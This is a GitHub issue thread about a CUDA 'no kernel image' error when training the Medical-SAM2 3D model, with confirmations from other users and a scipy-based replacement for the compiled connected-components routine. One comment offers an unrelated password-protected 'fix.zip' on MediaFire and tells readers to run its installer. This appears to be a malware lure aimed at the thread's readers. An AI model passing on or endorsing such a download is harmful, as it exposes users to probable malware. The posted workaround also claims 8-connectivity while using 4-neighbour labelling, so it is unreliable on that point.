### ISSUE TITLE
train_3d.py

### ISSUE THREAD

**Issue by Wcl-China** [MedicineToken/Medical-SAM2#16]
# I got an error when executing the train 3d.py script

# The command and error information are as follows

(medsam2) (base) root@7a3a88562600:/workspace/vs-code/Medical-SAM2# python train_3d.py -net sam2 -exp_name BTCV_MedSAM2 -sam_ckpt ./checkpoints/sam2_hiera_small.pt -sam_config sam2_hiera_s -image_size 1024 -val_freq 1 -prompt bbox -prompt_freq 2 -dataset btcv -data_path ./data/btcv
/workspace/vs-code/Medical-SAM2/func_3d/function.py:41: FutureWarning: torch.cuda.amp.GradScaler(args...) is deprecated. Please use torch.amp.GradScaler('cuda', args...) instead.
scaler = torch.cuda.amp.GradScaler()
INFO:root:Namespace(net='sam2', encoder='vit_b', exp_name='BTCV_MedSAM2', vis=False, train_vis=False, prompt='bbox', prompt_freq=2, pretrain=None, val_freq=1, gpu=True, gpu_device=0, image_size=1024, out_size=1024, distributed='none', dataset='btcv', sam_ckpt='./checkpoints/sam2_hiera_small.pt', sam_config='sam2_hiera_s', video_length=2, b=1, lr=0.0001, weights=0, multimask_output=1, memory_bank_size=16, data_path='./data/btcv', path_helper={'prefix': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59', 'ckpt_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Model', 'log_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Log', 'sample_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Samples'})
Namespace(net='sam2', encoder='vit_b', exp_name='BTCV_MedSAM2', vis=False, train_vis=False, prompt='bbox', prompt_freq=2, pretrain=None, val_freq=1, gpu=True, gpu_device=0, image_size=1024, out_size=1024, distributed='none', dataset='btcv', sam_ckpt='./checkpoints/sam2_hiera_small.pt', sam_config='sam2_hiera_s', video_length=2, b=1, lr=0.0001, weights=0, multimask_output=1, memory_bank_size=16, data_path='./data/btcv', path_helper={'prefix': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59', 'ckpt_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Model', 'log_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Log', 'sample_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Samples'})
Epoch 0: 0%| | 0/24 [00:09<?, ?img/s]
Traceback (most recent call last):
File "/workspace/vs-code/Medical-SAM2/train_3d.py", line 114, in <module>
main()
File "/workspace/vs-code/Medical-SAM2/train_3d.py", line 97, in main
loss, prompt_loss, non_prompt_loss = function.train_sam(args, net, optimizer1, optimizer2, nice_train_loader, epoch)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/workspace/vs-code/Medical-SAM2/func_3d/function.py", line 114, in train_sam
_, _, _ = net.train_add_new_bbox(
^^^^^^^^^^^^^^^^^^^^^^^
File "/workspace/vs-code/Medical-SAM2/sam2_train/sam2_video_predictor.py", line 439, in train_add_new_bbox
out_frame_idx, out_obj_ids, out_mask_logits = self.train_add_new_points(
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/workspace/vs-code/Medical-SAM2/sam2_train/sam2_video_predictor.py", line 523, in train_add_new_points
current_out, _ = self._run_single_frame_inference(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/workspace/vs-code/Medical-SAM2/sam2_train/sam2_video_predictor.py", line 1351, in _run_single_frame_inference
pred_masks_gpu = fill_holes_in_mask_scores(
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/workspace/vs-code/Medical-SAM2/sam2_train/utils/misc.py", line 255, in fill_holes_in_mask_scores
is_hole = (labels > 0) & (areas <= max_area)
^^^^^^^^^^
RuntimeError: CUDA error: no kernel image is available for execution on the device
Compile with TORCH_USE_CUDA_DSA to enable device-side assertions.
# Here's my cuda and torch info
![image](https://github.com/user-attachments/assets/ebc1155c-9c0d-419f-bbfe-241a9154de3b)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by astlian9** [comment]
Same problem. Using A100 GPU, Cuda 12.4, PyTorch 2.4.0

**Comment by jiayuanz3** [comment]
This issue seems to be directly linked to SAM2 and here's a potential solution: https://github.com/facebookresearch/segment-anything-2/issues/111

**Comment by Zong-Liang** [comment]
> # I got an error when executing the train 3d.py script
> # The command and error information are as follows
> (medsam2) (base) root@7a3a88562600:/workspace/vs-code/Medical-SAM2# python train_3d.py -net sam2 -exp_name BTCV_MedSAM2 -sam_ckpt ./checkpoints/sam2_hiera_small.pt -sam_config sam2_hiera_s -image_size 1024 -val_freq 1 -prompt bbox -prompt_freq 2 -dataset btcv -data_path ./data/btcv /workspace/vs-code/Medical-SAM2/func_3d/function.py:41: FutureWarning: torch.cuda.amp.GradScaler(args...) is deprecated. Please use torch.amp.GradScaler('cuda', args...) instead. scaler = torch.cuda.amp.GradScaler() INFO:root:Namespace(net='sam2', encoder='vit_b', exp_name='BTCV_MedSAM2', vis=False, train_vis=False, prompt='bbox', prompt_freq=2, pretrain=None, val_freq=1, gpu=True, gpu_device=0, image_size=1024, out_size=1024, distributed='none', dataset='btcv', sam_ckpt='./checkpoints/sam2_hiera_small.pt', sam_config='sam2_hiera_s', video_length=2, b=1, lr=0.0001, weights=0, multimask_output=1, memory_bank_size=16, data_path='./data/btcv', path_helper={'prefix': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59', 'ckpt_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Model', 'log_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Log', 'sample_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Samples'}) Namespace(net='sam2', encoder='vit_b', exp_name='BTCV_MedSAM2', vis=False, train_vis=False, prompt='bbox', prompt_freq=2, pretrain=None, val_freq=1, gpu=True, gpu_device=0, image_size=1024, out_size=1024, distributed='none', dataset='btcv', sam_ckpt='./checkpoints/sam2_hiera_small.pt', sam_config='sam2_hiera_s', video_length=2, b=1, lr=0.0001, weights=0, multimask_output=1, memory_bank_size=16, data_path='./data/btcv', path_helper={'prefix': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59', 'ckpt_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Model', 'log_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Log', 'sample_path': 'logs/BTCV_MedSAM2_2024_08_26_12_45_59/Samples'}) Epoch 0: 0%| | 0/24 [00:09<?, ?img/s] Traceback (most recent call last): File "/workspace/vs-code/Medical-SAM2/train_3d.py", line 114, in main() File "/workspace/vs-code/Medical-SAM2/train_3d.py", line 97, in main loss, prompt_loss, non_prompt_loss = function.train_sam(args, net, optimizer1, optimizer2, nice_train_loader, epoch) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/workspace/vs-code/Medical-SAM2/func_3d/function.py", line 114, in train_sam _, _, _ = net.train_add_new_bbox( ^^^^^^^^^^^^^^^^^^^^^^^ File "/workspace/vs-code/Medical-SAM2/sam2_train/sam2_video_predictor.py", line 439, in train_add_new_bbox out_frame_idx, out_obj_ids, out_mask_logits = self.train_add_new_points( ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/workspace/vs-code/Medical-SAM2/sam2_train/sam2_video_predictor.py", line 523, in train_add_new_points current_out, _ = self._run_single_frame_inference( ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/workspace/vs-code/Medical-SAM2/sam2_train/sam2_video_predictor.py", line 1351, in _run_single_frame_inference pred_masks_gpu = fill_holes_in_mask_scores( ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/workspace/vs-code/Medical-SAM2/sam2_train/utils/misc.py", line 255, in fill_holes_in_mask_scores is_hole = (labels > 0) & (areas <= max_area) ^^^^^^^^^^ RuntimeError: CUDA error: no kernel image is available for execution on the device Compile with TORCH_USE_CUDA_DSA to enable device-side assertions.
> 
> # Here's my cuda and torch info
> ![image](https://private-user-images.githubusercontent.com/86510288/361438494-ebc1155c-9c0d-419f-bbfe-241a9154de3b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MTkyODIsIm5iZiI6MTcyNDgxODk4MiwicGF0aCI6Ii84NjUxMDI4OC8zNjE0Mzg0OTQtZWJjMTE1NWMtOWMwZC00MTlmLWJiZmUtMjQxYTkxNTRkZTNiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDA0MjMwMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTU1ZmJhOGRiZmZkNzQ4MGJkYWU5MTg2NjQ0ODFlYjhmZWY4MGFhYTI3YmIzZmNiYzVhNzYwZTFhYTI0OGI4NmUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.1ZdVrqlyNZx-avZj9ycycL4_rPoPTJFqylSXeakLQSs)

Same here~ Have you solved this problem? 
![image](https://github.com/user-attachments/assets/2da5192d-f65b-4546-a48b-3d3b82518167)
![image](https://github.com/user-attachments/assets/93e72ea6-f6f5-4ca2-8da0-a3d295b999fe)
I also tried this, but it didn't work.
![image](https://github.com/user-attachments/assets/62a1796f-4409-426d-a56c-3807d77e0338)

**Comment by Weixiang-Sun** [comment]
> Have you solved this problem?

Have you solved this problem? I almost try everything but it still appears

**Comment by cxy0025** [comment]
Have you solved this problem?

**Comment by liamyzq** [comment]
> Have you solved this problem?



> > Have you solved this problem?
> 
> Have you solved this problem? I almost try everything but it still appears

I find a way to avoid the problem happens. It seems that in /Medical-SAM2/sam2_train/utils/misc.py, the function fill_holes_in_mask_scores use a C accelerated version of "get_connected_components", which is realized in/Medical-SAM2/sam2_train/csrc/connected_components.cu. However, it seems that (maybe) most of us do not have nvcc properly working to run this accelerated version. I write a function instead of using the C accelerated version:



def get_connected_components(mask):
    """
    Get the connected components (8-connectivity) of binary masks of shape (N, 1, H, W).

    Inputs:
    - mask: A binary mask tensor of shape (N, 1, H, W), where 1 is foreground and 0 is
            background.

    Outputs:
    - labels: A tensor of shape (N, 1, H, W) containing the connected component labels
              for foreground pixels and 0 for background pixels.
    - counts: A tensor of shape (N, 1, H, W) containing the area of the connected
              components for foreground pixels and 0 for background pixels.
    """
    # from sam2_train import _C
    # # First change mask to cpu
    # A = _C.get_connected_componnets(mask.to(torch.uint8).contiguous())
    # Change A to cuda if mask was on cuda
    import numpy as np
    from scipy.ndimage import label as ndi_label

    def get_connected_components(inputs: torch.Tensor):
        """
        Find connected components in a batch of 2D binary masks.
        
        Args:
            inputs (torch.Tensor): shape [N,1,H,W], dtype=torch.uint8 (or bool).
        
        Returns:
            labels (torch.IntTensor): [N,1,H,W], component labels (0=background, 1..K).
            counts (torch.IntTensor): [N,1,H,W], for each pixel, the size of its component.
        """
        assert inputs.dim() == 4 and inputs.size(1) == 1, "inputs must be [N,1,H,W]"
        if inputs.dtype not in (torch.uint8, torch.bool):
            raise TypeError("inputs must be torch.uint8 or torch.bool")
        
        device = inputs.device
        N, _, H, W = inputs.shape
        labels = torch.zeros((N,1,H,W), dtype=torch.int32, device=device)
        counts = torch.zeros((N,1,H,W), dtype=torch.int32, device=device)
        
        for n in range(N):
            # move to CPU and binarize
            mask_np = inputs[n,0].cpu().numpy().astype(bool)
            # label connected components; connectivity=1 (4-neighbor)
            labeled_np, num_features = ndi_label(mask_np)
            
            # compute size of each label (incl. background at index 0)
            sizes = np.bincount(labeled_np.ravel(), minlength=(num_features+1))
            # map sizes back onto each pixel
            counts_np = sizes[labeled_np]
            
            # write back to tensors
            labels[n,0] = torch.from_numpy(labeled_np.astype(np.int32)).to(device)
            counts[n,0] = torch.from_numpy(counts_np.astype(np.int32)).to(device)
        
        return labels, counts

    A = get_connected_components(mask.to(torch.uint8).contiguous())

    return A

And now everything is working fine though slower.

**Comment by cxy0025** [comment]
收到，会尽快查看，谢谢。
